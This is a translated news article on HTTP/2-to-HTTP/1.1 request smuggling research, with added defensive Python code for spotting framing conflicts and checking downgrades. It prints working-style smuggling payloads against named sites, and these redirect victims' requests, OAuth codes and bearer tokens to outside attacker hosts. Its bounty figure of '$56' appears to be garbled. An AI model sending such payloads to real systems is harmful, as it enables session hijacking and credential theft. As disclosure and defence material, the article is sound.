A new attack on front-end/back-end systems that allows wedging into other users' requests

Web systems in which the front end accepts connections over HTTP/2 and forwards them to the back end over HTTP/1.1 are exposed to a new variant of the HTTP Request Smuggling attack. By sending specially crafted client requests, it makes it possible to wedge into the content of requests from other users that are processed over the same connection between the front end and the back end. The attack can be used to inject malicious JavaScript code into a session with a legitimate site, bypass access control systems, and intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery systems and other setups in which requests are forwarded in a front-end/back-end arrangement. The author of the research demonstrated the ability to attack systems at Netflix, Verizon, Bitbucket, Netlify CDN and Atlassian, and received $56 from vulnerability bounty programs. The issue was also confirmed in F5 network products. The issue partially affects mod_proxy in the Apache http server (CVE-2021-33193); a fix is expected in version 2.4.49 (the developers were notified of the issue in early May and were given 3 months to fix it). In nginx, the ability to specify the "Content-Length" and "Transfer-Encoding" headers at the same time was blocked in the latest release (1.21.1). Attack tooling has already been added to the Burp toolkit and is available as a Turbo Intruder extension.

The principle behind the new method of wedging requests into traffic is similar to the vulnerability discovered by the same researcher two years ago, but that one was limited to front ends accepting requests over HTTP/1.1. Recall that in a front-end/back-end arrangement, client requests are received by an additional node, the front end, which establishes a long-lived TCP connection to the back end that actually processes the requests. Over this shared connection, requests from different users are usually transmitted one after another, following each other along the chain, over the HTTP protocol.

The classic "HTTP Request Smuggling" attack relies on the fact that the front end and the back end interpret the HTTP headers "Content-Length" (which specifies the total size of the data in the request) and "Transfer-Encoding: chunked" (which allows the data to be transferred in parts) differently. For example, if the front end only supports "Content-Length" and ignores "Transfer-Encoding: chunked", an attacker can send a request that contains both "Content-Length" and "Transfer-Encoding: chunked", but whose "Content-Length" value does not match the size of the chunked sequence. In that case the front end forwards the request according to "Content-Length", while the back end waits for the chunked stream to complete according to "Transfer-Encoding: chunked", and the remaining tail of the attacker's request ends up at the beginning of the next request transmitted on behalf of someone else.
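As an added illustration of the boundary disagreement described above (example code, not from the research or the page): a small Python parser that computes where a Content-Length-only parser and a chunked parser would each end the same message on a shared connection. The sample stream is constructed, and the chunked parser assumes there are no trailer fields.

```python
# Constructed sample: both framing headers present, with Content-Length covering
# 22 body bytes while the chunked encoding ends after the first 5 ("0\r\n\r\n").
SAMPLE = (
    b"POST /n HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 22\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /n HTTP/1.1\r\n"
)

def parse_head(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, [(name, value)], body offset)."""
    head_end = raw.index(b"\r\n\r\n")
    lines = raw[:head_end].split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, head_end + 4

def end_by_content_length(raw: bytes) -> int:
    """Offset at which a parser honoring only Content-Length ends the message."""
    _, headers, body = parse_head(raw)
    return body + int(dict(headers)[b"content-length"])

def end_by_chunked(raw: bytes) -> int:
    """Offset at which a chunked parser ends the message (assumes no trailers)."""
    _, _, pos = parse_head(raw)
    while True:
        line_end = raw.index(b"\r\n", pos)
        size = int(raw[pos:line_end].split(b";")[0], 16)  # chunk-size, extensions ignored
        pos = line_end + 2 + size + 2                      # chunk data plus its trailing CRLF
        if size == 0:
            return pos

def framing_conflict(raw: bytes):
    """Return (cl_end, te_end, leftover) when both headers are present and the two
    parsers disagree, else None. 'leftover' is what a chunked parser would treat
    as the start of the *next* message on the connection."""
    _, headers, _ = parse_head(raw)
    names = {n for n, _ in headers}
    if not {b"content-length", b"transfer-encoding"} <= names:
        return None
    cl_end, te_end = end_by_content_length(raw), end_by_chunked(raw)
    return None if cl_end == te_end else (cl_end, te_end, raw[te_end:cl_end])

if __name__ == "__main__":
    print(framing_conflict(SAMPLE))
```

A front end that refuses any message where framing_conflict is not None (or that strips one of the two headers, as nginx 1.21.1 now does) leaves the back end no room to pick a different boundary.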

Unlike the text-based HTTP/1.1 protocol, which is parsed line by line, HTTP/2 is a binary protocol and operates on blocks of data of a predetermined size. However, HTTP/2 uses pseudo-headers that correspond to the regular HTTP headers. When talking to the back end over HTTP/1.1, the front end translates these pseudo-headers into the equivalent HTTP/1.1 headers. The problem is that the back end makes its decisions about parsing the stream based on the HTTP headers produced by the front end, without knowing the framing of the original request.

The values "content-length" and "transfer-encoding" can be transmitted even in pseudo-header form, although they are not used in HTTP/2, since the size of all data is determined by a separate field. However, when an HTTP/2 request is converted to HTTP/1.1, these headers are carried over and can confuse the back end. There are two main attack variants, H2.TE and H2.CL, in which the back end is misled by an incorrect transfer-encoding or content-length value that does not match the actual size of the request body received by the front end over the HTTP/2 protocol.


As an example of an H2.CL attack, an incorrect content-length pseudo-header is specified when sending an HTTP/2 request to Netflix. This request leads to the addition of a corresponding Content-Length HTTP header when the back end is accessed over HTTP/1.1, but since the size given in Content-Length is smaller than the actual size, part of the data in the tail is processed as the beginning of the next request.

For example, the HTTP/2 request:

:method POST
:path /n
:authority www.netflix.com
content-length 4

abcdGET /n HTTP/1.1
Host: 02.rs?x.netflix.com
Foo: bar

will be sent to the back end as:

POST /n HTTP/1.1
Host: www.netflix.com
Content-Length: 4

abcdGET /n HTTP/1.1
Host: 02.rs?x.netflix.com
Foo: bar

Since Content-Length is set to 4, the back end accepts only "abcd" as the request body and processes the rest, "GET /n HTTP/1.1…", as the beginning of the next request, which belongs to another user. As a result, the stream falls out of sync, and the response to the next request is the result of processing the spoofed request. In the Netflix case, specifying a third-party host in the "Host:" header of the spoofed request caused the response "Location: https://02.rs?x.netflix.com/n" to be returned to the client, allowing arbitrary content to be delivered to the client, including execution of the attacker's JavaScript code in the context of the Netflix site.

The second attack variant (H2.TE) relies on substituting the "Transfer-Encoding: chunked" header. The use of the transfer-encoding pseudo-header in HTTP/2 is prohibited by the specification, which prescribes that requests containing it be treated as erroneous. Despite this, some front-end implementations disregard this requirement and allow the transfer-encoding pseudo-header in HTTP/2, translating it into the corresponding HTTP header. If the "Transfer-Encoding" header is present, the back end may give it priority and parse the data in parts in "chunked" mode, using blocks of varying size in the format "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0", regardless of the original framing and total size.

The existence of such a gap was demonstrated using Verizon as an example. The problem actually concerned the authentication portal and content management system that is also used by sites such as the Huffington Post and Engadget. For example, the client request over HTTP/2:

:method POST
:path /identity/XUI
:authority id.b2b.oath.com
transfer-encoding chunked

0

GET /oops HTTP/1.1
Host: psres.net
Content-Length: 10

x=

resulted in the following HTTP/1.1 request being sent to the back end:

POST /identity/XUI HTTP/1.1
Host: id.b2b.oath.com
Content-Length: 66
Transfer-Encoding: chunked

0

GET /oops HTTP/1.1
Host: psres.net
Content-Length: 10

x=

The back end, in turn, ignored the "Content-Length" header and split the stream based on "Transfer-Encoding: chunked". In practice, the attack made it possible to redirect users' requests to the attacker's own site, including intercepting requests related to OAuth authentication, whose parameters showed up in the Referer header, as well as simulating an authentication session and triggering the sending of user credentials to the attacker's host:

GET /b2blanding/show/oops HTTP/1.1
Host: psres.net
Referer: https://id.b2b.oath.com/?…&code=secret

GET / HTTP/1.1
Host: psres.net
Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik…

For attacking HTTP/2 implementations that do not allow the transfer-encoding pseudo-header to be specified directly, another method was proposed: the "Transfer-Encoding" header is smuggled in by attaching it to another pseudo-header, separated by a newline (when converted to HTTP/1.1, this yields two separate HTTP headers).

For example, Atlassian Jira and Netlify CDN (used to serve the Firefox start page for Mozilla) were affected by this problem. In particular, the HTTP/2 request:

:method POST
:path /
:authority start.mozilla.org
foo b\r\n
 transfer-encoding: chunked\r\n
 \r\n
 0\r\n
 \r\n
 GET / HTTP/1.1\r\n
 Host: evil-netlify-domain\r\n
 Content-Length: 5\r\n
 \r\n
 x=

resulted in the following HTTP/1.1 request being sent to the back end:

POST / HTTP/1.1\r\n
Host: start.mozilla.org\r\n
Foo: b\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 71\r\n
\r\n
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: evil-netlify-domain\r\n
Content-Length: 5\r\n
\r\n
x=

Another way of smuggling the "Transfer-Encoding" header is to attach it to the name of another pseudo-header or to the string carrying the request method. For example, when accessing Atlassian Jira, a pseudo-header named "foo: bar\r\ntransfer-encoding" with the value "chunked" caused the HTTP headers "foo: bar" and "transfer-encoding: chunked" to be added, and placing the value "GET / HTTP/1.1\r\nTransfer-encoding: chunked" in the ":method" pseudo-header was translated into the request line "GET / HTTP/1.1" followed by the header "transfer-encoding: chunked".
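All three downgrade mistakes described above (H2.CL, H2.TE and header splitting through embedded CR/LF in pseudo-header names, values or the method) can be refused at the point where the front end rewrites the request. The following Python function is an added example, not code from the research or from any of the products named in the article; it assumes the front end already holds the fully framed HTTP/2 body, and the sample pseudo-headers are constructed.

```python
import re

CTL = re.compile(rb"[\r\n\x00]")
TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")   # RFC 7230 tchar

# Constructed pseudo-headers for a well-formed request (not from the article).
SAMPLE_PSEUDO = {b":method": b"POST", b":path": b"/n", b":authority": b"example.test"}

class DowngradeError(ValueError):
    """Raised when a request cannot be downgraded without an ambiguous boundary."""

def downgrade_h2_to_h1(pseudo: dict, headers: list, body: bytes) -> bytes:
    """Serialize an HTTP/2 request (pseudo-headers, header list, fully framed body)
    as HTTP/1.1, refusing anything that would let the back end choose a different
    message boundary than the front end saw: CR/LF in names, values or pseudo-headers
    (header splitting), transfer-encoding (H2.TE), and a content-length that disagrees
    with the framed body (H2.CL)."""
    method, path, authority = (pseudo[k] for k in (b":method", b":path", b":authority"))
    for v in (method, path, authority):
        if re.search(rb"[\r\n\x00 ]", v):
            raise DowngradeError("CR, LF or space in pseudo-header")
    out = [b"%s %s HTTP/1.1" % (method, path), b"Host: " + authority]
    for name, value in headers:
        name = name.lower()
        if not TOKEN.match(name) or CTL.search(value):
            raise DowngradeError("CR/LF or non-token character in header")
        if name == b"transfer-encoding":
            raise DowngradeError("transfer-encoding is forbidden in HTTP/2")
        if name == b"content-length":
            if not value.isdigit() or int(value) != len(body):
                raise DowngradeError("content-length disagrees with framed body")
            continue  # re-emitted below from the real body length
        out.append(name + b": " + value)
    out.append(b"Content-Length: %d" % len(body))  # the front end's own count is authoritative
    return b"\r\n".join(out) + b"\r\n\r\n" + body

def accepts(pseudo: dict, headers: list, body: bytes) -> bool:
    """True if the request downgrades cleanly, False if it is rejected."""
    try:
        downgrade_h2_to_h1(pseudo, headers, body)
        return True
    except DowngradeError:
        return False
```

Each of the article's request shapes (the Netflix content-length mismatch, the Verizon transfer-encoding pseudo-header, the Netlify and Jira CR/LF injections) is rejected by this check, while a plain request is serialized with a single, consistent Content-Length.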

The researcher who identified the problem also proposed a request tunnelling technique for attacking front ends that keep a separate pool of connections for each IP address, so that traffic from different users is not mixed. This technique does not allow wedging into other users' requests, but it does allow poisoning a shared cache, which affects the processing of other requests, and it allows substituting the internal HTTP headers used to pass service information from the front end to the back end (for example, when authentication is performed on the front end, such headers may carry information about the current user to the back end). As an example of applying the method in practice, cache poisoning made it possible to gain control over pages in the Bitbucket service.

source: budenet.ru
